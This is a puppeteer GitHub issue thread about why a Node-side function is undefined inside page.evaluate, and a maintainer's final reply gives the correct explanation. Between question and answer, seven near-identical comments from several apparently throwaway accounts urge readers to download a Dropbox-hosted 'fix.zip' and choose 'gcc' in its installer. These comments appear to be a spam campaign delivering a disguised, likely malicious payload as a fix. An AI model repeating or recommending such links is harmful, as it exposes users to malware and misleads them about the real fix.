### ISSUE TITLE
How do I import a function into the page context?

### ISSUE THREAD

**Issue by 4e576rt8uh9ij9okp** [puppeteer/puppeteer#12998]
### Minimal, reproducible example

```TypeScript
function documentHeight(){
    return Math.max( body.scrollHeight, body.offsetHeight, html.clientHeight, html.scrollHeight, html.offsetHeight )
}

;(async () => {
    const browser = await pup.launch()
    const page = await browser.newPage()
    await page.setViewport({width: 1280, height: 720})
    await page.goto('https://google.com')

    await page.evaluate(() => {
let pageHeight = documentHeight()
        console.log(pageHeight)
    })
})()
```

### Expectation

I want to use the function inside page.evaluate

### Reality

function is not defined
function being "documentHeight"

### Puppeteer version

123

### Node version

123

### Package manager

npm

### Package manager version

123

### Operating system

Windows

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by OrKoN** [comment]
You would need to include the function source into the function you evaluate or evaluate them on the page ahead of time. See https://pptr.dev/guides/javascript-execution for more details on how it works: the functions are serialized to strings and evaluated in the page context, therefore, functions that are not defined in the page context will not be available.
